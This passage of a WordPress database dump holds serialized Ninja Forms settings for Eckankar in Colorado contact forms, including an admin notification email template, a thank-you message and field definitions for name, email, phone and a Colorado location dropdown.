Team</em><br>https://www.eckankar-utah.org</p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:154;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-01-28 10:29:47\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:360:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:155;}i:3;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-01-28 10:29:47\";s:5:\"label\";s:11:\"Admin Email\";s:19:\"email_message_plain\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:33:\"Eckankar In Colorado Contact Form\";s:12:\"from_address\";s:29:\"contact@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:37:\"Mountain Areas - Form Record Received\";s:13:\"email_message\";s:1746:\"<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><h1 style=\"color: #23507d;\"><u>ECKANKAR Mountain Areas<br></u></h1><h3>You Have A New Web Contact Form Submission. <br>This form was generated by a user on the Eckankar In Colorado website.</h3><h3>Here is a copy of the information submitted by {field:textbox_268}</h3></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"background-color: #eeeeee;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p>&nbsp;</p><p class=\"\" style=\"font-size: 17px;\"><b>First Name:</b>&nbsp; {field:textbox_268}</p><p class=\"\" style=\"font-size: 17px;\"><b>Last Name:</b>&nbsp; {field:lastname_269}</p><p class=\"\" style=\"font-size: 17px;\"><b>Email:&nbsp;</b> {field:email_270}</p><p class=\"\" style=\"font-size: 17px;\"><b>Phone:</b>&nbsp; {field:phone_1599585699152}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message Subject:</b>&nbsp; {field:textbox_303}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message:&nbsp;</b> {field:please_enter_your_message_here_1599585729237}</p><p>&nbsp;</p></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\"><br>If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>The Eckankar in Colorado Team<br>https://www.eckankar-colorado.org</p><p>&nbsp;</p><p>&nbsp;</p></div></div></div></div>\";s:14:\"drawerDisabled\";b:0;s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";}s:2:\"id\";i:156;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:27:\"Mountain Areas Contact Form\";s:10:\"created_at\";s:19:\"2021-01-28 10:29:47\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-03-03 03:15:50\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:2:\"36\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:9:{i:0;s:11:\"textbox_268\";i:1;s:12:\"lastname_269\";i:2;s:19:\"phone_1599585699152\";i:3;s:9:\"email_270\";i:4;s:11:\"textbox_303\";i:5;s:44:\"please_enter_your_message_here_1599585729237\";i:6;s:8:\"html_305\";i:7;s:18:\"html_1663800560932\";i:8;s:10:\"submit_278\";}s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(41,'a:7:{s:2:\"id\";i:41;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:11:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"0\";s:11:\"idAttribute\";s:2:\"id\";s:3:\"key\";s:7:\"html_20\";s:15:\"container_class\";s:0:\"\";s:7:\"default\";s:227:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado / ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\n\";s:13:\"element_class\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"show_desc\";s:1:\"0\";s:7:\"desc_el\";s:3:\"div\";s:13:\"default_value\";s:231:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Central Colorado /Â ECK Temple in Colorado Leadership Communications</span></span></span></strong></span></h3>\r\n\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:5:\"label\";s:4:\"Text\";s:4:\"type\";s:4:\"html\";s:14:\"drawerDisabled\";b:0;s:9:\"field_key\";s:7:\"html_20\";s:11:\"field_label\";s:4:\"Text\";}s:2:\"id\";i:376;}i:1;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:3:\"key\";s:10:\"textbox_21\";s:7:\"default\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:9:\"desc_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:9:\"label_pos\";s:5:\"above\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:4:\"type\";s:7:\"textbox\";s:21:\"custom_name_attribute\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:10:\"textbox_21\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:377;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:9:\"Last Name\";s:6:\"def_id\";s:1:\"7\";s:4:\"type\";s:8:\"lastname\";s:5:\"value\";s:0:\"\";s:23:\"personally_identifiable\";s:1:\"1\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:9:\"field_key\";s:11:\"lastname_22\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"lastname_22\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"show_desc\";s:1:\"0\";}s:2:\"id\";i:378;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"email_23\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:8:\"email_23\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:15:\"input_limit_msg\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:13:\"disable_input\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:11:\"calc_option\";s:1:\"0\";s:17:\"calc_auto_include\";s:1:\"0\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";}s:2:\"id\";i:379;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:8:\"phone_24\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:8:\"phone_24\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:15:\"input_limit_msg\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:11:\"input_limit\";s:0:\"\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";}s:2:\"id\";i:380;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:7:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 